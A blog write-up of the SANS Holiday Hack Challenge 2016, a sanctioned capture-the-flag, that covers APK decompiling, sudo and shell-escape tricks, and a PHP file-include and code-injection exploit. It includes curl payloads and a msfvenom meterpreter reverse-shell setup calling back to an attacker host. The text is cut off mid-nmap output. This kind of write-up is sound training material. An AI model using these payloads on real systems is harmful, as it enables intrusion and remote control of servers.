<!DOCTYPE html>
<html ⚡>
<head>
    <meta charset="utf-8">

    <title>SANS Holiday Hack 2016</title>
    <meta name="description" content="" />

    <meta name="HandheldFriendly" content="True" />
    <meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1">

    <link rel="shortcut icon" href="../../favicon.ico">

    <link rel="canonical" href="../index.html" />
    <meta name="referrer" content="no-referrer-when-downgrade" />
    
    <meta property="og:site_name" content="thought|pipe" />
    <meta property="og:type" content="article" />
    <meta property="og:title" content="SANS Holiday Hack 2016" />
    <meta property="og:description" content="Part 1: A Most Curious Business Card 1: What is the secret message in Santa&#x27;s tweets? Answer: bugbounty Solution: Load all tweets, open developer tools, and turn on preserve log   $(&quot;div.js-tweet-text-container&quot;).text(); 2: What is inside the ZIP file distributed by Santa&#x27;s team? Answer: SantaGram_v4.2.apk Solution:" />
    <meta property="og:url" content="http://blog.elauqsap.com/sans-holiday-hack-2016/" />
    <meta property="og:image" content="http://blog.elauqsap.com/content/images/2017/01/sans_2016.png" />
    <meta property="article:published_time" content="2017-01-06T07:31:58.000Z" />
    <meta property="article:modified_time" content="2017-01-12T07:22:00.000Z" />
    <meta property="article:tag" content="SANS" />
    <meta property="article:tag" content="pentest" />
    <meta property="article:tag" content="CTF" />
    <meta property="article:tag" content="holiday hack" />
    
    <meta name="twitter:card" content="summary_large_image" />
    <meta name="twitter:title" content="SANS Holiday Hack 2016" />
    <meta name="twitter:description" content="Part 1: A Most Curious Business Card 1: What is the secret message in Santa&#x27;s tweets? Answer: bugbounty Solution: Load all tweets, open developer tools, and turn on preserve log   $(&quot;div.js-tweet-text-container&quot;).text(); 2: What is inside the ZIP file distributed by Santa&#x27;s team? Answer: SantaGram_v4.2.apk Solution:" />
    <meta name="twitter:url" content="http://blog.elauqsap.com/sans-holiday-hack-2016/" />
    <meta name="twitter:image" content="http://blog.elauqsap.com/content/images/2017/01/sans_2016.png" />
    <meta name="twitter:label1" content="Written by" />
    <meta name="twitter:data1" content="Pasquale D&#x27;Agostino" />
    <meta name="twitter:label2" content="Filed under" />
    <meta name="twitter:data2" content="SANS, pentest, CTF, holiday hack" />
    <meta property="og:image:width" content="2841" />
    <meta property="og:image:height" content="1862" />
    
    <script type="application/ld+json">
{
    "@context": "https://schema.org",
    "@type": "Article",
    "publisher": {
        "@type": "Organization",
        "name": "thought|pipe",
        "logo": "http://blog.elauqsap.com/ghost/img/ghosticon.jpg"
    },
    "author": {
        "@type": "Person",
        "name": "Pasquale D&#x27;Agostino",
        "image": {
            "@type": "ImageObject",
            "url": "//www.gravatar.com/avatar/a38c65b780e8dbf9cc9d2920c89378e0?s=250&d=mm&r=x",
            "width": 250,
            "height": 250
        },
        "url": "http://blog.elauqsap.com/author/pasquale/",
        "sameAs": []
    },
    "headline": "SANS Holiday Hack 2016",
    "url": "http://blog.elauqsap.com/sans-holiday-hack-2016/",
    "datePublished": "2017-01-06T07:31:58.000Z",
    "dateModified": "2017-01-12T07:22:00.000Z",
    "image": {
        "@type": "ImageObject",
        "url": "http://blog.elauqsap.com/content/images/2017/01/sans_2016.png",
        "width": 2841,
        "height": 1862
    },
    "keywords": "SANS, pentest, CTF, holiday hack",
    "description": "Part 1: A Most Curious Business Card 1: What is the secret message in Santa&#x27;s tweets? Answer: bugbounty Solution: Load all tweets, open developer tools, and turn on preserve log   $(&quot;div.js-tweet-text-container&quot;).text(); 2: What is inside the ZIP file distributed by Santa&#x27;s team? Answer: SantaGram_v4.2.apk Solution:",
    "mainEntityOfPage": {
        "@type": "WebPage",
        "@id": "http://blog.elauqsap.com"
    }
}
    </script>

    <meta name="generator" content="Ghost 0.11" />
    <link rel="alternate" type="application/rss+xml" title="thought|pipe" href="../../rss/index.html" />

    <link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Merriweather:300,700,700italic,300italic|Open+Sans:700,600,400" />
    <style amp-custom>
        /* ==========================================================================
           Table of Contents
           ========================================================================== */

        /*

            0. Normalize
            1. General
            2. Utilities
            3. AMP Post
            4. Footer

        */

        /* ==========================================================================
           0. normalize.css v3.0.3 | MIT License | git.io/normalize | (minified)
           ========================================================================== */

        html {
            font-family: sans-serif;

            -ms-text-size-adjust: 100%;
            -webkit-text-size-adjust: 100%;
        }
        body {
            margin: 0;
        }
        article,
        aside,
        details,
        figcaption,
        figure,
        footer,
        header,
        main,
        menu,
        nav,
        section,
        summary {
            display: block;
        }
        audio,
        canvas,
        progress,
        video {
            display: inline-block;
            vertical-align: baseline;
        }
        audio:not([controls]) {
            display: none;
            height: 0;
        }
        [hidden],
        template {
            display: none;
        }
        a {
            background-color: transparent;
        }
        a:active,
        a:hover {
            outline: 0;
        }
        abbr[title] {
            border-bottom: 1px dotted;
        }
        b,
        strong {
            font-weight: bold;
        }
        dfn {
            font-style: italic;
        }
        h1 {
            margin: 0.67em 0;
            font-size: 2em;
        }
        mark {
            background: #ff0;
            color: #000;
        }
        small {
            font-size: 80%;
        }
        sub,
        sup {
            position: relative;
            vertical-align: baseline;
            font-size: 75%;
            line-height: 0;
        }
        sup {
            top: -0.5em;
        }
        sub {
            bottom: -0.25em;
        }
        img {
            border: 0;
        }
        amp-img {
            border: 0;
        }
        svg:not(:root) {
            overflow: hidden;
        }
        figure {
            margin: 1em 40px;
        }
        hr {
            box-sizing: content-box;
            height: 0;
        }
        pre {
            overflow: auto;
        }
        code,
        kbd,
        pre,
        samp {
            font-family: monospace, monospace;
            font-size: 1em;
        }
        button,
        input,
        optgroup,
        select,
        textarea {
            margin: 0;
            color: inherit;
            font: inherit;
        }
        button {
            overflow: visible;
        }
        button,
        select {
            text-transform: none;
        }
        button,
        html input[type="button"],
        input[type="reset"],
        input[type="submit"] {
            cursor: pointer;

            -webkit-appearance: button;
        }
        button[disabled],
        html input[disabled] {
            cursor: default;
        }
        button::-moz-focus-inner,
        input::-moz-focus-inner {
            padding: 0;
            border: 0;
        }
        input {
            line-height: normal;
        }
        input[type="checkbox"],
        input[type="radio"] {
            box-sizing: border-box;
            padding: 0;
        }
        input[type="number"]::-webkit-inner-spin-button,
        input[type="number"]::-webkit-outer-spin-button {
            height: auto;
        }
        input[type="search"] {
            -webkit-appearance: textfield;
        }
        input[type="search"]::-webkit-search-cancel-button,
        input[type="search"]::-webkit-search-decoration {
            -webkit-appearance: none;
        }
        fieldset {
            margin: 0 2px;
            padding: 0.35em 0.625em 0.75em;
            border: 1px solid #c0c0c0;
        }
        legend {
            padding: 0;
            border: 0;
        }
        textarea {
            overflow: auto;
        }
        optgroup {
            font-weight: bold;
        }
        table {
            border-spacing: 0;
            border-collapse: collapse;
        }
        td,
        th {
            padding: 0;
        }


        /* ==========================================================================
           1. General - Setting up some base styles
           ========================================================================== */

        html {
            max-height: 100%;
            height: 100%;
            font-size: 62.5%;

            -webkit-tap-highlight-color: rgba(0, 0, 0, 0);
        }

        body {
            max-height: 100%;
            height: 100%;
            color: #3a4145;
            background: #f4f8fb;
            letter-spacing: 0.01rem;
            font-family: "Merriweather", serif;
            font-size: 1.8rem;
            line-height: 1.75em;
            text-rendering: geometricPrecision;

            -webkit-font-feature-settings: "kern" 1;
            -moz-font-feature-settings: "kern" 1;
            -o-font-feature-settings: "kern" 1;
        }

        ::-moz-selection {
            background: #d6edff;
        }

        ::selection {
            background: #d6edff;
        }

        h1,
        h2,
        h3,
        h4,
        h5,
        h6 {
            margin: 0 0 0.3em 0;
            color: #2e2e2e;
            font-family: "Open Sans", sans-serif;
            line-height: 1.15em;
            text-rendering: geometricPrecision;

            -webkit-font-feature-settings: "dlig" 1, "liga" 1, "lnum" 1, "kern" 1;
            -moz-font-feature-settings: "dlig" 1, "liga" 1, "lnum" 1, "kern" 1;
            -o-font-feature-settings: "dlig" 1, "liga" 1, "lnum" 1, "kern" 1;
        }

        h1 {
            text-indent: -2px;
            letter-spacing: -1px;
            font-size: 2.6rem;
        }

        h2 {
            letter-spacing: 0;
            font-size: 2.4rem;
        }

        h3 {
            letter-spacing: -0.6px;
            font-size: 2.1rem;
        }

        h4 {
            font-size: 1.9rem;
        }

        h5 {
            font-size: 1.8rem;
        }

        h6 {
            font-size: 1.8rem;
        }

        a {
            color: #4a4a4a;
        }

        a:hover {
            color: #111;
        }

        p,
        ul,
        ol,
        dl {
            margin: 0 0 2.5rem 0;
            font-size: 1.5rem;
            text-rendering: geometricPrecision;

            -webkit-font-feature-settings: "liga" 1, "onum" 1, "kern" 1;
            -moz-font-feature-settings: "liga" 1, "onum" 1, "kern" 1;
            -o-font-feature-settings: "liga" 1, "onum" 1, "kern" 1;
        }

        ol,
        ul {
            padding-left: 2em;
        }

        ol ol,
        ul ul,
        ul ol,
        ol ul {
            margin: 0 0 0.4em 0;
            padding-left: 2em;
        }

        dl dt {
            float: left;
            clear: left;
            overflow: hidden;
            margin-bottom: 1em;
            width: 180px;
            text-align: right;
            text-overflow: ellipsis;
            white-space: nowrap;
            font-weight: 700;
        }

        dl dd {
            margin-bottom: 1em;
            margin-left: 200px;
        }

        li {
            margin: 0.4em 0;
        }

        li li {
            margin: 0;
        }

        hr {
            display: block;
            margin: 1.75em 0;
            padding: 0;
            height: 1px;
            border: 0;
            border-top: #efefef 1px solid;
        }

        blockquote {
            box-sizing: border-box;
            margin: 1.75em 0 1.75em 0;
            padding: 0 0 0 1.75em;
            border-left: #4a4a4a 0.4em solid;

            -moz-box-sizing: border-box;
        }

        blockquote p {
            margin: 0.8em 0;
            font-style: italic;
        }

        blockquote small {
            display: inline-block;
            margin: 0.8em 0 0.8em 1.5em;
            color: #ccc;
            font-size: 0.9em;
        }

        blockquote small:before {
            content: "\2014 \00A0";
        }

        blockquote cite {
            font-weight: 700;
        }

        blockquote cite a {
            font-weight: normal;
        }

        mark {
            background-color: #fdffb6;
        }

        code,
        tt {
            padding: 1px 3px;
            border: #e3edf3 1px solid;
            background: #f7fafb;
            border-radius: 2px;
            white-space: pre-wrap;
            font-family: Inconsolata, monospace, sans-serif;
            font-size: 0.85em;
            font-feature-settings: "liga" 0;

            -webkit-font-feature-settings: "liga" 0;
            -moz-font-feature-settings: "liga" 0;
        }

        pre {
            overflow: auto;
            box-sizing: border-box;
            margin: 0 0 1.75em 0;
            padding: 10px;
            width: 100%;
            border: #e3edf3 1px solid;
            background: #f7fafb;
            border-radius: 3px;
            white-space: pre;
            font-family: Inconsolata, monospace, sans-serif;
            font-size: 0.9em;

            -moz-box-sizing: border-box;
        }

        pre code,
        pre tt {
            padding: 0;
            border: none;
            background: transparent;
            white-space: pre-wrap;
            font-size: inherit;
        }

        kbd {
            display: inline-block;
            margin-bottom: 0.4em;
            padding: 1px 8px;
            border: #ccc 1px solid;
            background: #f4f4f4;
            border-radius: 4px;
            box-shadow: 0 1px 0 rgba(0, 0, 0, 0.2),
            0 1px 0 0 #fff inset;
            color: #666;
            text-shadow: #fff 0 1px 0;
            font-size: 0.9em;
            font-weight: 700;
        }

        table {
            box-sizing: border-box;
            margin: 1.75em 0;
            max-width: 100%;
            width: 100%;
            background-color: transparent;

            -moz-box-sizing: border-box;
        }

        table th,
        table td {
            padding: 8px;
            border-top: #efefef 1px solid;
            vertical-align: top;
            text-align: left;
            line-height: 20px;
        }

        table th {
            color: #000;
        }

        table caption + thead tr:first-child th,
        table caption + thead tr:first-child td,
        table colgroup + thead tr:first-child th,
        table colgroup + thead tr:first-child td,
        table thead:first-child tr:first-child th,
        table thead:first-child tr:first-child td {
            border-top: 0;
        }

        table tbody + tbody {
            border-top: #efefef 2px solid;
        }

        table table table {
            background-color: #fff;
        }

        table tbody > tr:nth-child(odd) > td,
        table tbody > tr:nth-child(odd) > th {
            background-color: #f6f6f6;
        }

        table.plain tbody > tr:nth-child(odd) > td,
        table.plain tbody > tr:nth-child(odd) > th {
            background: transparent;
        }

        iframe,
        amp-iframe,
        .fluid-width-video-wrapper {
            display: block;
            margin: 1.75em 0;
        }

        /* When a video is inside the fitvids wrapper, drop the
        margin on the iframe, cause it breaks stuff. */
        .fluid-width-video-wrapper iframe,
        .fluid-width-video-wrapper amp-iframe {
            margin: 0;
        }

        textarea,
        select,
        input {
            margin: 0 0 5px 0;
            padding: 6px 9px;
            width: 260px;
            outline: 0;
            border: #e7eef2 1px solid;
            background: #fff;
            border-radius: 4px;
            box-shadow: none;
            font-family: "Open Sans", sans-serif;
            font-size: 1.6rem;
            line-height: 1.4em;
            font-weight: 100;

            -webkit-appearance: none;
        }

        textarea {
            min-width: 250px;
            min-height: 80px;
            max-width: 340px;
            width: 100%;
            height: auto;
        }

        input[type="text"]:focus,
        input[type="email"]:focus,
        input[type="search"]:focus,
        input[type="tel"]:focus,
        input[type="url"]:focus,
        input[type="password"]:focus,
        input[type="number"]:focus,
        input[type="date"]:focus,
        input[type="month"]:focus,
        input[type="week"]:focus,
        input[type="time"]:focus,
        input[type="datetime"]:focus,
        input[type="datetime-local"]:focus,
        textarea:focus {
            outline: none;
            outline-width: 0;
            border: #bbc7cc 1px solid;
            background: #fff;
        }

        select {
            width: 270px;
            height: 30px;
            line-height: 30px;
        }

        /* ==========================================================================
           2. Utilities
           ========================================================================== */

        /* Clears shit */
        .clearfix:before,
        .clearfix:after {
            content: " ";
            display: table;
        }
        .clearfix:after {
            clear: both;
        }
        .clearfix {
            zoom: 1;
        }

        /* ==========================================================================
           3. AMP Post
           ========================================================================== */



        .main-header {
            position: relative;
            display: table;
            overflow: hidden;
            box-sizing: border-box;
            width: 100%;
            height: 50px;
            background: #5ba4e5 no-repeat center center;
            background-size: cover;
            text-align: left;

            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
        }

        .content {
            background: #fff;
            padding-top: 15px;
        }
        .blog-title,
        .content {
            margin: auto;
            max-width: 600px;
        }

        .blog-title a {
            display: block;
            padding-right: 16px;
            padding-left: 16px;
            height: 50px;
            color: #fff;
            text-decoration: none;
            font-family: "Open Sans", sans-serif;
            font-size: 16px;
            line-height: 50px;
            font-weight: 600;
        }

        .post {
            position: relative;
            margin-top: 0;
            margin-right: 16px;
            margin-left: 16px;
            padding-bottom: 0;
            max-width: 100%;
            border-bottom: #ebf2f6 1px solid;
            word-wrap: break-word;
            font-size: 0.95em;
            line-height: 1.65em;
        }

        .post-header {
            margin-bottom: 1rem;
        }

        .post-title {
            margin-bottom: 0;
        }

        .post-title a {
            text-decoration: none;
        }

        .post-meta {
            display: block;
            margin: 3px 0 0 0;
            color: #9eabb3;
            font-family: "Open Sans", sans-serif;
            font-size: 1.3rem;
            line-height: 2.2rem;
        }

        .post-meta a {
            color: #9eabb3;
            text-decoration: none;
        }

        .post-meta a:hover {
            text-decoration: underline;
        }

        .post-meta .author {
            margin: 0;
            font-size: 1.3rem;
            line-height: 1.3em;
        }

        .post-date {
            display: inline-block;
            text-transform: uppercase;
            white-space: nowrap;
            font-size: 1.2rem;
            line-height: 1.2em;
        }

        .post-image {
            margin: 0;
            padding-top: 3rem;
            padding-bottom: 30px;
            border-top: 1px #E8E8E8 solid;
        }

        /* Keep images centered, and allow images wider than the main
           text column to break out. */
        .post-content amp-img,
        .post-content amp-anim {
            /* Centers an image by (1) pushing its left edge to the
               center of its container and (2) shifting the entire image
               in the opposite direction by half its own width.
               Works for images that are larger than their containers. */
            position: relative;
            left: 50%;
            display: block;
            padding: 0;
            min-width: 0;
            max-width: 112%; /* fallback when calc doesn't work */
            width: calc(100% + 32px); /* expand with to image + margins */
            height: auto;
            transform: translateX(-50%);

            -webkit-transform: translateX(-50%); /* for Safari and iOS */
            -ms-transform: translateX(-50%); /* for IE9 */
        }

        .footnotes {
            font-size: 1.3rem;
            line-height: 1.6em;
            font-style: italic;
        }

        .footnotes li {
            margin: 0.6rem 0;
        }

        .footnotes p {
            margin: 0;
        }

        .footnotes p a:last-child {
            text-decoration: none;
        }

        /* ==========================================================================
           4. Footer - The bottom the AMP Post
           ========================================================================== */

        .site-footer {
            position: relative;
            margin: 0 auto 20px auto;
            padding: 1rem 15px;
            max-width: 600px;
            color: rgba(0,0,0,0.5);
            font-family: "Open Sans", sans-serif;
            font-size: 1.1rem;
            line-height: 1.75em;
        }

        .site-footer a {
            color: rgba(0,0,0,0.5);
            text-decoration: none;
            font-weight: bold;
        }

        .site-footer a:hover {
            border-bottom: #bbc7cc 1px solid;
        }

        .poweredby {
            display: block;
            float: right;
            width: 45%;
            text-align: right;
        }

        .copyright {
            display: block;
            float: left;
            width: 45%;
        }
    </style>

    <style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}</style><noscript><style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none}</style></noscript>
    <script async src="https://cdn.ampproject.org/v0.js"></script>

    

</head>

<body class="amp-template">
    <header class="main-header">
        <nav class="blog-title">
            <a href="../../index.html">thought|pipe</a>
        </nav>
    </header>

    <main class="content" role="main">
        <article class="post">

            <header class="post-header">
                <h1 class="post-title">SANS Holiday Hack 2016</h1>
                <section class="post-meta">
                    <p class="author">by <a href="../../author/pasquale/index.html">Pasquale D&#x27;Agostino</a></p>
                    <time class="post-date" datetime="2017-01-06">2017-01-06</time>
                </section>
            </header>
            <figure class="post-image">
                <amp-img src="http://blog.elauqsap.com/content/images/2017/01/sans_2016.png" width="600" height="400" layout="responsive"></amp-img>
            </figure>
            <section class="post-content">

                <h3 id="part1amostcuriousbusinesscard">Part 1: A Most Curious Business Card</h3>

<p><strong>1: What is the secret message in Santa's tweets?</strong></p>

<pre><code>Answer: bugbounty
</code></pre>

<p>Solution: Load all tweets, open developer tools, and turn on preserve log  </p>

<pre><code class="language-javascript">$(&quot;div.js-tweet-text-container&quot;).text();
</code></pre>

<p><strong>2: What is inside the ZIP file distributed by Santa's team?</strong></p>

<pre><code>Answer: SantaGram_v4.2.apk
</code></pre>

<p>Solution: After exploring the North Pole a bit, I stumbled upon Pepper Minstix in the Workshop who mentioned <a href="http://www.northpolewonderland.com/dungeon.zip">dungeon.zip</a>. Although this zip is referenced later it is not the one the question is referring to. The real zip name is hidden at the top of this instagram <a href="https://www.instagram.com/p/BNpA2kEBF85/?taken-by=santawclaus">post</a>. Swapping <code>SantaGram_v4.2.zip</code> for <code>dungeon.zip</code> in the URL gives you the password protected <a href="http://northpolewonderland.com/SantaGram_v4.2.zip">file</a>. Which the password happens to be <code>bugbounty</code>, the hidden message from the tweets earlier.</p>

<h3 id="part2awesomepackagekonveyance">Part 2: Awesome Package Konveyance</h3>

<p><strong>3: What username and password are embedded in the APK file?</strong></p>

<pre><code>Answer: guest:busyreindeer78
</code></pre>

<p>Solution: <br></br>
Not too far away from Pepper is our friend Shinny Upatree who is in the Workshop Train Station. He gives a little clue into a tool that can help us decompile <code>SantaGram_v4.2.apk</code>.  </p>

<pre><code class="language-bash">git clone https://github.com/skylot/jadx.git  
cd jadx  
./gradlew dist
bin/jadx -d SantaGram_jadx SantaGram_v4.2.apk  
grep -r &quot;password&quot; SantaGram_jadx/  
grep -B1 &quot;password&quot; SantaGram_jadx/com/northpolewonderland/santagram/b.java  
</code></pre>

<p><strong>4: What is the name of the audible component (audio file) in the SantaGram APK file?</strong></p>

<pre><code>Answer: discombobulatedaudio1.mp3
</code></pre>

<p>Solution:  </p>

<pre><code class="language-bash">grep -r &quot;audio&quot; SantaGram_jadx/  
</code></pre>

<p>To get the audio file, use <a href="https://ibotpeaches.github.io/Apktool/">apktool</a> that Bushy Evergreen references. Simply disassemble the resources and copy the file.  </p>

<pre><code class="language-bash">apktool d SantaGram_v4.2.zip  
cp SantaGram_v4.2/res/raw/discombobulatedaudio1.mp3 .  
</code></pre>

<p><strong>Bonus:</strong>
Using <code>grep</code> to search for <code>http</code> and <code>https</code> in the APK produced a few subdomains of the challenge that might be useful later on.</p>

<pre><code class="language-bash">grep -r &quot;\.com/&quot; | grep -v &quot;android\.com&quot;  
</code></pre>

<blockquote>
  <p>Yes! $IP is in scope! Just make sure you don't launch denial of service attacks, or otherwise interfere with the host's production processing. Dirbuster will not help you. - Mr. Tom Hessman</p>
</blockquote>

<p>We shall see about the dirbuster Mr. Tom Hessman!</p>

<p><strong>In Scope Targets</strong></p>

<pre><code class="language-bash">104.198.252.157  
https://analytics.northpolewonderland.com/  
https://analytics.northpolewonderland.com/report.php?type=launch  
https://analytics.northpolewonderland.com/report.php?type=usage

104.198.221.240  
http://ads.northpolewonderland.com/  
http://ads.northpolewonderland.com/affiliate/C9E380C8-2244-41E3-93A3-D6C6700156A5

35.184.63.245  
http://dev.northpolewonderland.com/  
http://dev.northpolewonderland.com/index.php

35.184.47.139  
http://dungeon.northpolewonderland.com/

104.154.196.33  
http://ex.northpolewonderland.com/  
http://ex.northpolewonderland.com/exception.php  
</code></pre>

<h3 id="part3afreshbakedholidaypi">Part 3: A Fresh-Baked Holiday Pi</h3>

<p>After collecting the power cord, heat sink, hdmi cable, sd card, and cranberry pi board the user needs to speak with Holly Evergreen over by the portal. She gives you the <a href="http://northpolewonderland.com/cranbian.img.zip">cranbian image</a> to perform the next steps.</p>

<h6 id="5whatisthepasswordforthecranpiaccountonthecranberrypisystem">5: What is the password for the &quot;cranpi&quot; account on the Cranberry Pi system?</h6>

<pre><code>Answer: yummycookies
</code></pre>

<p>Solution: Going back over by the Christmas tree we see Wunorse Openslae and he refers us to an <a href="https://pen-testing.sans.org/blog/2016/12/07/mount-a-raspberry-pi-file-system-image">article</a> for mounting Raspberry Pi images.</p>

<h6 id="6howdidyouopeneachterminaldoorandwherehadthevillainimprisonedsanta">6: How did you open each terminal door and where had the villain imprisoned Santa?</h6>

<pre><code>Answer: DFER 1978
</code></pre>

<h6 id="elfhouse2">Elf House #2</h6>

<blockquote>
  <p>To open the door, find both parts of the passphrase inside the /out.pcap file</p>
</blockquote>

<pre><code>Answer: santaslittlehelper
</code></pre>

<p>Solution: The banner hints that <code>tcpdump</code> will be needed in order to complete the task. However, it is not available to the user that you run as <code>scratchy</code>. Following a hint, <code>sudo -l</code> mentions that <code>tcpdump</code> and <code>strings</code> can run without a password. The man-page for <code>sudo</code> shows that the <code>-u</code> flag allows you to set a user before running a command. The first part of the passphrase is easy to find and can be found using either <code>tcpdump</code> or <code>strings</code>. After trying to find a way to extract the second part's bin file, I stumpled on Jeff McJunkin's <a href="https://www.reddit.com/r/netsec/comments/5hmlkj/the_2016_sans_holiday_hack_challenge/db5qoes/">hint</a>. Playing with the encodings allowed a simple output with the second part of the passphrase to be found.</p>

<pre><code class="language-bash">sudo -l  
# Matching Defaults entries for scratchy on e06cab9d52fb:
#    env_reset, mail_badpass,
#    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
# User scratchy may run the following commands on e06cab9d52fb:
#    (itchy) NOPASSWD: /usr/sbin/tcpdump
#    (itchy) NOPASSWD: /usr/bin/strings
sudo -u itchy strings /out.pcap  
# &lt;input type=&quot;hidden&quot; name=&quot;part1&quot; value=&quot;santasli&quot; /&gt;
sudo -u itchy strings -e l /out.pcap  
# part2:ttlehelper
</code></pre>

<h6 id="santasoffice">Santa's Office</h6>

<blockquote>
  <p>To open the door, find the passphrase file deep in the directories.</p>
</blockquote>

<pre><code>Answer: open_sesame
</code></pre>

<p>Solution: The banner hint suggests some hidden and trick named directories. A simple recursive list of the user's home directory gave some interesting output that was heavily nested in <code>./.doormat/. / /\/\\/Don't Look Here!/You are persistent, aren't you?/'/</code>.</p>

<pre><code class="language-bash">ls -laR | grep -B4 &quot;key&quot;  
find . -name &quot;key_for_the_door.txt&quot; -exec cat '{}' +  
</code></pre>

<h6 id="thecorridor">The Corridor</h6>

<blockquote>
  <p>GREETINGS PROFESSOR FALKEN.</p>
</blockquote>

<pre><code>Answer: LOOK AT THE PRETTY LIGHTS
</code></pre>

<p>Solution: The terminal emulates the W.O.P.R computer from the movie WarGames. The password is given by responding to the queues with the correct lines from the script.</p>

<h6 id="dfer">DFER</h6>

<blockquote>
  <p>Find the passphrase from the wumpus.  Play fair or cheat; it's up to you.</p>
</blockquote>

<pre><code>Answer: wumpus is misunderstood
</code></pre>

<p>Solution: No nifty hack on this one, just play <code>wumpus</code> and try not to miss!</p>

<h6 id="trainstation">Train Station</h6>

<pre><code>Answer: 24fb3e89ce2aa0ea422c3d511d40dd84
</code></pre>

<p>Solution: The Train Management Console has a Help Menu that uses <code>less</code> to display it. One of the options while using <code>less</code> is to execute a command like <code>!command /bin/bash</code>. The password is located in the <code>Train_Console</code> script or you can bypass it and execute start from the cli.  </p>

<pre><code class="language-bash">./ActivateTrain
</code></pre>

<p><strong>Bonus:</strong>
Activating the train allows you to travel back in time to the North Pole circa 1978. Santa is located in the Dungeon For Errant Reindeer (DFER) but doesn't remember how he got there.</p>

<h3 id="part4mygoshitsfullofholes">Part 4: My Gosh... It's Full of Holes</h3>

<p>The Mobile Analytics Server (via credentialed login access)</p>

<pre><code>Answer: Credentials in Source Code
</code></pre>

<p>Solution: Log into the <a href="https://analytics.northpolewonderland.com/">analytics</a> server using the credentials harvested from the APK and click the link to <a href="https://analytics.northpolewonderland.com/getaudio.php?id=20c216bc-b8b1-11e6-89e1-42010af00008">discombobulatedaudio2.mp3</a>.</p>

<p>The Dungeon Game</p>

<pre><code>Incomplete
</code></pre>

<p>The Debug Server</p>

<pre><code>Incomplete
</code></pre>

<p>The Banner Ad Server</p>

<pre><code>Incomplete
</code></pre>

<p>The Uncaught Exception Handler Server</p>

<pre><code>Answer: Local File Includes and Code Injection
</code></pre>

<p>Solution: Sugarplum Mary gives us the initial insight we need in order to exploit this system. The APK gives you the format in which to make the requests when you dig into how a crash dump request is built. Modifying the request to accommodate the example in the <a href="https://pen-testing.sans.org/blog/2016/12/07/getting-moar-value-out-of-php-local-file-include-vulnerabilities">hint</a> returns the handler code.  </p>

<pre><code class="language-bash"># gets you the code for the exception handler
curl -vH &quot;Content-Type: application/json&quot; -d '{&quot;data&quot;:{&quot;crashdump&quot;:&quot;php://filter/convert.base64-encode/resource=exception&quot;}, &quot;operation&quot;:&quot;ReadCrashDump&quot;}' &quot;http://ex.northpolewonderland.com/exception.php&quot; | base64 -d &gt; exception.php  
</code></pre>

<p>There are two primary functions in <code>exception.php</code>, <code>processCrashdump($crashdump)</code> which happens on a <code>WriteCrashDump</code> operation and <code>readCrashdump($requestedCrashdump)</code> on a <code>ReadCrashDump</code>. <code>$crashdump</code> is a parameter nested in the <code>data</code> portion of the JSON content sent to the server.  </p>

<pre><code class="language-php">&lt;?php  
# snippet from processCrashdump where un-sanitized user input is allowed
$crashdump_encoded = &quot;&lt;?php print('&quot; . json_encode($crashdump, JSON_PRETTY_PRINT) . &quot;');&quot;;
# snippet from readCrashdump where the un-sanitized user input can be executed
require($requestedCrashdump['crashdump'] . '.php');  
</code></pre>

<blockquote>
  <p>Audio file from Discombobulator in webroot: discombobulated-audio-6-XyzE3N9YqKNH.mp3</p>
</blockquote>

<p>The exception handler code references <a href="http://ex.northpolewonderland.com/discombobulated-audio-6-XyzE3N9YqKNH.mp3">discombobulatedaudio6.mp3</a> is stored at the webroot for the nginx server.</p>

<p><strong>Bonus:</strong>
It is possible to get remote access to this server. Build a reverse tcp shell for <code>php</code> using <code>msfvenom</code>. The code for the reverse shell needs to be modified to exclude certain characters but the end result should be something similar to <code>'); $MODIFIED_EXPLOIT print('</code>.  </p>

<pre><code class="language-bash">msfvenom -p php/meterpreter/reverse_tcp LHOST=$IP LPORT=$PORT -f raw &gt; ex_shell.php  
</code></pre>

<p>Format for the <code>WriteCrashDump</code> reverse tcp shell payload, <code>crashdump.json</code>.  </p>

<pre><code class="language-json">{
    &quot;operation&quot;: &quot;WriteCrashDump&quot;,
    &quot;data&quot;: &quot;'); $MODIFIED_EXPLOIT print('&quot;
}
</code></pre>

<p>Setup a metasploit handler to receive and setup a meterpreter session.  </p>

<pre><code class="language-bash">msf exploit(handler) &gt; set PAYLOAD php/meterpreter/reverse_tcp  
PAYLOAD =&gt; php/meterpreter/reverse_tcp

msf exploit(handler) &gt; set LHOST 0.0.0.0  
LHOST =&gt; 0.0.0.0

msf exploit(handler) &gt; exploit

[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Starting the payload handler...
</code></pre>

<p>In another shell, write the payload to disk and then use the <code>crashdump-XXXXXX</code> from the response in the read request to execute the payload.  </p>

<pre><code class="language-bash">curl -vH &quot;Content-Type: application/json&quot; -d @crashdump.json &quot;http://ex.northpolewonderland.com/exception.php&quot;  
curl -vH &quot;Content-Type: application/json&quot; -d '{&quot;data&quot;:{&quot;crashdump&quot;:&quot;crashdump-XXXXXX&quot;}, &quot;operation&quot;:&quot;ReadCrashDump&quot;}' &quot;http://ex.northpolewonderland.com/exception.php&quot;  
</code></pre>

<p>The Mobile Analytics Server (post authentication)</p>

<pre><code>Answer: Nmap, Source Code, and SQL Injection
</code></pre>

<p>Solution:</p>

<pre><code class="language-bash">PORT    STATE SERVICE  
22/tcp  open  ssh  
| ssh-hostkey:
|   1024 5d:5c:37:9c:67:c2:40:94:b0:0c:80:63:d4:ea:80:ae (DSA)
|   2048 f2:25:e1:9f:ff:fd:e3:6e:94:c6:76:fb:71:01:e3:eb (RSA)
|_  256 4c:04:e4:25:7f:a1:0b:8c:12:3c:58:32:0f:dc:51:bd (ECDSA)
443/tcp open  https  
| http-git:
